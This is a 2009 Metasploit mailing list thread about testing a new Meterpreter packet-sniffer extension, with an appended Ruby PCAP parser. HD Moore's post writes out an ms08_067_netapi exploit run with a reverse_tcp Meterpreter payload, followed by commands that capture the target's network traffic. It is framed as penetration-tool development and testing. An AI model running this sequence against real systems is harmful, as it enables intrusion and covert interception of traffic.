Metasploit mailing list archives

Meterpreter Sniffer module


From: xyberpix at xyberpix.com (xyberpix)
Date: Sat, 11 Jul 2009 16:26:50 +0100

Nah, was running it locally on OS X, and the target was a Windows XP  
SP0 host, but that was running in Fusion, would that make a  
difference? All other 'sploits work fine though?

xyberpix

On 11 Jul 2009, at 16:23, Carlos Perez wrote:

Were you running it on a VM in Fusion? There are some steps that  
have to be taken in Fusion to let a VM sniff, the same with ESX and  
ESXi, just in case.

On Sat, Jul 11, 2009 at 10:51 AM, xyberpix <xyberpix at xyberpix.com>  
wrote:

Hey HD,

Just did a quick test, and it barfed on me, dunno though whether  
this is the code or my setup. Running on OS X 10.5.7, with MacPorts  
installed.

meterpreter > use sniffer
Loading extension sniffer...[-] failure: No response was received to the core_loadlib request.
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/client_core.rb:157:in `use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:266:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in `cmd_use'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run'
/Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in `interact'
/Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter >


xyberpix


On 11 Jul 2009, at 15:38, HD Moore wrote:

I committed a test version of the sniffer extension to the SVN  
trunk. The module in SVN is compiled with debug support, so you  
should see lots of verbose debug prints if you attach a debugger to  
the process where meterpreter is running. I could use some help  
testing this new extension; so far it looks like there are some  
cases where the "use sniffer" command fails (exploiting ms03-026 on  
win2003 sp0), but there may be others as well.


To obtain the latest version of Metasploit on UNIX platforms:
 $ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
 1. Download https://metasploit.com/framework-3.3-dev.exe
 2. Execute this and extract the framework to a directory
 3. Inside the extracted directory execute msfupdate.bat
 4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we  
have a license); it can sniff packets from the target system without  
writing to the filesystem or installing any drivers. The module  
automatically excludes its own control traffic from the packet  
capture. As of this week, all Meterpreter communication is now  
protected by TLS/SSL, including the packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

  Command             Description
  -------             -----------
  sniffer_dump        Retrieve captured packet data
  sniffer_interfaces  List all remote sniffable interfaces
  sniffer_start       Capture packets on a previously opened interface
  sniffer_stats       View statistics of an active capture
  sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a  
new one.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


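As an added example (mine, not code from the thread above or from the Metasploit project): a small pure-Ruby libpcap reader/writer that checks two things HD's post states about sniffer_dump, namely that the capture excludes the session's own control traffic and that a second dump appends packet records to an existing file rather than writing a fresh global header. The session addresses (192.168.0.139:4444 -> 192.168.0.120:1687) are taken from the session line in the post; the Ethernet/IPv4/TCP frames are constructed sample input, no Metasploit API is called, and the "leaked" control frames in the usage are an assumed failure case used only to show what a bad capture would look like.

```ruby
# Added example: a minimal libpcap reader/writer, written for this thread and
# not taken from Metasploit. It checks two things HD's post states about
# sniffer_dump: the capture excludes the session's own control traffic, and a
# second dump appends records to an existing file instead of writing a new
# global header. Session addresses come from the post; frames are constructed.
require 'stringio'

PCAP_MAGIC        = 0xa1b2c3d4   # little-endian libpcap magic
LINKTYPE_ETHERNET = 1
GLOBAL_HDR_LEN    = 24
RECORD_HDR_LEN    = 16

# libpcap global header: magic, major, minor, thiszone, sigfigs, snaplen, linktype.
def pcap_global_header(snaplen = 65_535)
  [PCAP_MAGIC, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET].pack('VvvVVVV')
end

# One packet record: ts_sec, ts_usec, incl_len, orig_len, followed by the frame.
def pcap_record(frame, ts_sec = 0, ts_usec = 0)
  [ts_sec, ts_usec, frame.bytesize, frame.bytesize].pack('VVVV') + frame
end

# Constructed Ethernet/IPv4/TCP frame (checksums left zero; only the 5-tuple
# matters for the parser below). Sample input, not captured data.
def tcp_frame(src_ip, sport, dst_ip, dport, payload = '')
  eth = ([0] * 12 + [0x0800]).pack('C12n')
  ip  = [0x45, 0, 40 + payload.bytesize, 0, 0, 64, 6, 0].pack('CCnnnCCn') +
        src_ip.split('.').map(&:to_i).pack('C4') +
        dst_ip.split('.').map(&:to_i).pack('C4')
  tcp = [sport, dport, 0, 0, 0x50, 0x18, 8192, 0, 0].pack('nnNNCCnnn')
  eth + ip + tcp + payload.b
end

# Append frames to an existing capture (nil or empty string => new file),
# emitting the global header only when the capture is created.
def pcap_append(existing, frames)
  out = (existing.nil? || existing.empty?) ? pcap_global_header : existing.dup
  frames.each_with_index { |fr, i| out << pcap_record(fr, i) }
  out
end

# Parse a capture into {src:, sport:, dst:, dport:} hashes, one per TCP packet;
# anything that is not IPv4/TCP over Ethernet is skipped.
def pcap_tcp_flows(data)
  io = StringIO.new(data)
  magic = io.read(GLOBAL_HDR_LEN).unpack1('V')
  raise 'not a little-endian libpcap file' unless magic == PCAP_MAGIC
  flows = []
  until io.eof?
    hdr = io.read(RECORD_HDR_LEN)
    break if hdr.nil? || hdr.bytesize < RECORD_HDR_LEN
    incl_len = hdr.unpack('VVVV')[2]
    frame = io.read(incl_len)
    next if frame.nil? || frame.bytesize < 54            # eth(14)+ip(20)+tcp(20)
    next unless frame[12, 2].unpack1('n') == 0x0800      # IPv4 ethertype
    next unless frame.getbyte(23) == 6                   # IP protocol: TCP
    ihl = (frame.getbyte(14) & 0x0f) * 4
    sport, dport = frame[14 + ihl, 4].unpack('nn')
    flows << { src: frame[26, 4].unpack('C4').join('.'), sport: sport,
               dst: frame[30, 4].unpack('C4').join('.'), dport: dport }
  end
  flows
end

# Packets belonging to the Meterpreter session itself, in either direction.
# The post says sniffer_dump filters these; a non-empty result means it did not.
def control_traffic(flows, lhost, lport, rhost, rport)
  flows.select do |f|
    (f[:src] == lhost && f[:sport] == lport && f[:dst] == rhost && f[:dport] == rport) ||
      (f[:src] == rhost && f[:sport] == rport && f[:dst] == lhost && f[:dport] == lport)
  end
end

if __FILE__ == $PROGRAM_NAME
  lhost, lport, rhost, rport = '192.168.0.139', 4444, '192.168.0.120', 1687
  # Constructed victim traffic, then a second "dump" appended to the first.
  victim = [tcp_frame(rhost, 1688, '192.168.0.1', 80, 'GET / HTTP/1.0'),
            tcp_frame('192.168.0.1', 80, rhost, 1688, 'HTTP/1.0 200 OK')]
  cap = pcap_append(nil, victim)
  cap = pcap_append(cap, [tcp_frame(rhost, 1689, '192.168.0.1', 443, 'hello')])
  flows = pcap_tcp_flows(cap)
  puts "#{flows.size} TCP packets, " \
       "#{control_traffic(flows, lhost, lport, rhost, rport).size} from the Meterpreter session"
end
```

Run it against a real /tmp/all.cap by replacing the constructed frames with `File.binread('/tmp/all.cap')` passed to pcap_tcp_flows; LHOST/LPORT and the session's source port come from the "Meterpreter session 1 opened" line. Appending is done here by writing records after the existing bytes and never repeating the 24-byte header, which is what keeps tools such as tcpdump or Wireshark reading the file after several sniffer_dump calls.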

